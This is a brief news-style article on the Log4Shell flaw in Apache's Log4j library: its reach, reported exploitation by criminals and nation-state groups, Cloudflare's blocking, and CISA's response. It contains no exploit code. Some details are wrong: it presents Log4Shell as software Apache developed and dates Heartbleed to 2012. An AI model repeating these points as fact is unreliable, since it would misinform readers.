Log4shell, developed by the Apache foundation and written in the programming language Java, is part of a code used by millions of computers running online services.
It's widely used in many applications and is present in many services as a dependency. This includes custom applications developed within organisations and numerous cloud services.
It has been downloaded 84 million times in the last month alone from the largest public repository of open-source Java components.
Alibaba, a Chinese tech company, first discovered the flaw last month with it gaining widespread public attention after its discovery in sites hosting versions of Minecraft using Java.
Microsoft has said that they have seen hackers using Log4Shell to steal passwords and log-ins, extract data from compromised systems, and install malicious software designed to mine cryptocurrency.
Microsoft is also reporting that some of these hackers are from nation-state hacking groups. They have identified hackers from Turkey, North Korea, China and Iran who are using the flaw for activities ranging from targeted attacks to active “experimentation”.
The Apache Software Foundation which oversees the Log4j code has rated the problem a “10” the highest level of seriousness. And the chief of Cloudflare John Graham-Cumming has called Log4Shell the “third serious flaw to affect a wide range of internet services”, after Heartbleed in 2012 and ShellShock in 2014.
In addition to this, Log4shell can be easily used, with one security company, Crowdstrike, calling it “trivial” to exploit. This is significant as often when a vulnerability is found in a computer system, there is a small amount of time available to fix it.
Because cybercriminals have to work out a way to attack, and usually only the smartest and most experienced of them can do this within the first few hours a vulnerability becomes apparent.
This incident has the potential to be extremely costly for corporations that become victims.
We do not yet know how many of these attempted attacks are successful - but this incident has the potential to be extremely costly for corporations that become victims. Not a lot of direct action can currently be done, for both individuals and businesses, other than wait for IT teams around the world to continue resolving the problem.
Experts are currently estimating it will take months or years to find new instances of this vulnerability across enterprises and vendors.
Cloudflare, a company that provides internet security and services designed to help online businesses operate smoothly, implemented measures to protect its users from vulnerability. Telling BBC News it had blocked 1.3 million attempts to use Log4Shell in just one hour, on Tuesday.
Other organisations, like the Cybersecurity and Infrastructure Security Agency (CISA) in the US, are taking further action to protect users. CISA has added Log4Shell to its "Known Exploited Vulnerabilities Catalog" a list of common security flaws that carry significant risk to federal organisations.
CISA has also advised all US organisations to follow their advice to mitigate the flaw, and have established a strict Christmas deadline for organisations to implement security patches.
Photo by Pierre Bamin on Unsplash